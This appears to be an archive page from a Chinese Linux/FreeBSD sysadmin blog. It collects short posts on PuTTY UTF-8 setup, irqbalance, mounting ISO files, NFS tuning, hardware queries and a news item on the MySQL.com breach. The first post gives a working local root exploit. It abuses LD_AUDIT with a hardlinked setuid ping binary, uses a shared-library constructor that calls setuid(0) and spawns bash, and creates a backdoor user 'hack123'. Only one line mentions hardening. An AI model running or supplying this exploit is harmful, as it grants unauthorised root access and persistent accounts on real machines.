kernel.org回来了!
作者归档:SK
很久的linux提权的一些过程
阵列笔记mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit/
ls -l /proc/$$/fd/3
vi s.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
gcc -w -fPIC -shared -o /tmp/exploit s.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 && adduser hack123 -p hack123
可以根据执行的命令,进行一系列的安全加固,比如ping的S权限等
putty输入中文
默认状态下向putty中输入中文会变成…可以用以下方法解决: Category中选择Window=>Appearance=>change…将字体设置为Fixedsys字符集设 置为CHINESE_GB2312 然后别忘了save一下要不就得每次更改了。主要是要把字符集设置为CHINESE_GB2312。
用putty登录了不能输入中文如何解决
1、
vi /etc/sysconfig/i18n
2、
LANG=”zh_CN.GB18030″
LANGUAGE=”zh_CN.GB18030:zh_CN.GB2312:zh_CN”
SUPPORTED=”zh_CN.GB18030:zh_CN:zh:en_US.UTF-8:en_US:en”
SYSFONT=”lat0-sun16″
SYSFONTACM=”8859-15″
3、保存退出
4、
source /etc/sysconfig/i18n
5、putty的中文支持还是很好的,呵呵打开putty主程序,选择window-〉Appearance-〉Font settings-〉Change…,选择Fixedsys字体,字符集选择CHINESE_GB2312。在window-〉Appearance-〉Translation中,Received data assumed to be in which character set 中,把Use font encoding改为UTF-8如果经常使用,把这些设置保存在session里面. 现在打开putty,登录成功后,在shell中输入:export LC_ALL=’zh_CN.utf8′,这样应该可以的
putty支持utf-8解决方案
suse建议用户使用utf8的字符集,但是通常在windows下的term终端使用utf8会带来一些问题,比如putty,使用 vi时,会发生一些问题。
下面是解决方法
Step1:
把 PuTTY 的字符集修改为 UTF-8,
window—-translation—received data assumed to be in which character set
改称utf8
然后选择一个支持 UTF-8 的中文字体,
如宋体、新宋体等。
Step2:
修改/etc/vimrc,加上
set encoding=utf-8
set fileencoding=utf-8
这样即可
当然,这是在linux下编辑的所有文本文件都是utf8格式的,如果需要转为gbk格式的,可以用下列命令
iconv -f utf-8 -t gbk src.txt >dst.txt
irqbalance服务
irqbalance现在被证实为非常有必要的服务,他的主要功能是可以合理的调配使用各个CPU核心,特别是对于目前主流多核心的CPU,简单的说就是能够把压力均匀的分配到各个CPU核心上,对提升性能有很大的帮助,我引用一段话:
启用 irqbalance 服务,既可以提升性能,又可以降低能耗。
irqbalance 用于优化中断分配,它会自动收集系统数据以分析使用模式,并依据系统负载状况将工作状态置于 Performance mode 或 Power-save mode。
处于 Performance mode 时,irqbalance 会将中断尽可能均匀地分发给各个 CPU core,以充分利用 CPU 多核,提升性能。
处于 Power-save mode 时,irqbalance 会将中断集中分配给第一个 CPU,以保证其它空闲 CPU 的睡眠时间,降低能耗。
(详见:http://www.irqbalance.org/documentation.php)
#使用一下命令观察cpu中断分配使用情况 mpstat -P ALL 1
FreeBSD下挂载ISO文件
挂载ISO
mdconfig -a -t vnode -f xxx.iso -u 0
mount -t cd9660 /dev/md0 /mnt/iso
卸载
umount /mnt/iso
mdconfig -d -u 0
centos6.0第三方yum源
昨天晚上我们升级了某台mysql的操作系统,从Centos5.x升级到了Centos6.0,Centos6.0使用2.6.32-7x的内核版本。但是自带的yum仓库源工具有限,有时候不能找到我们想要的工具,比如ifstat或者其他。所以我们需要安装支持第三方源仓库来充实yum的软件仓库。 继续阅读
MySQL.com被黑 黑客挂牌出售其root权限
Amorize的安全研究人员最近表示,已经确认黑客入侵mysql.com,并通过iframe的方法让用户感染了恶意代码,他们已经追踪到佛罗里达 和瑞典两个恶意软件托管地,在当地时间周一下午依然在对mysql.com的访客实施攻击,用户凭据可能已经遭到了窃取,因此建议mysql.com注册 过的用户修改自己与此相同的密码。
更糟的是研究发现,mysql.com的root权限似乎已经开始在俄罗斯的地下黑客论坛挂牌出售,价格3000美元,黑客们只要给钱就可以获得访问mysql.com的权限,可见问题的糟糕程度。

nfs挂载参数优化
mount_nfs -o async,noatime -T 192.168.4.180:/data/wwwroot/ /data/wwwroot/ 点击率15400/min
mount -t nfs -o tcp 192.168.4.180:/data/wwwroot/ /data/wwwroot/ 点击率4100/min
测试
webbench -c 1000 -t 100 “http://bbs.xxx.cn/test/w.php”
这个w.php是生产小文件,写很多小文件
FreeBSD硬件信息查看方法
FreeBSD硬件信息查看
1.有时候dmesg可以看到.时间长了就看不到了. 不过/var/run/dmesg.boot可以看
2. sysctl -a | grep “^dev\.”
3.pciconf -lv
4.dmidecode工具
yum的一些技巧
记录一下平常在centos服务器使用YUM工具的一些技巧。 继续阅读